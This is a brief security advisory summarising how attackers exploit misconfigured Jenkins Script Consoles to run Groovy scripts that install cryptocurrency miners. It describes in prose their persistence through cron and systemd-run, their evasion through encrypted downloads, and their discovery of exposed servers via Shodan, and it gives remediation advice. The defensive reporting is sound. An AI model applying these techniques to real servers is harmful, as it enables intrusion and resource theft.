Researchers discovered attackers targeting misconfigurations in the Jenkins Script Console to execute malicious Groovy scripts, leading to activities such as deploying cryptocurrency miners. By leveraging vulnerabilities and misconfigurations, such as improperly set authentication mechanisms, attackers can gain remote code execution capabilities, download miner binaries, and maintain persistence using cron jobs and systemd-run utilities. It is recommended to look for indicators of compromise in your environment, and if any are identified, remove the files immediately and redeploy workloads from a known clean state.
The Jenkins Script Console allows administrators to execute Groovy scripts with elevated permissions. By default, this console is restricted to authenticated users with administrative rights. However, if misconfigured, such as through improper authentication setups, attackers can gain access and execute scripts, leading to potential misuse. A search on Shodan indicates numerous publicly exposed Jenkins servers, which could serve as attack vectors if not properly secured.
An analysis revealed that attackers are using the Script Console to run scripts that download and execute a miner binary. The script checks for writable directories, ensures sufficient system resources by terminating high CPU-consuming processes, and maintains persistence through cron jobs and systemd-run utilities. The script also uses encrypted downloads and decryption to evade detection, ensuring that the miner binary remains persistent and operational.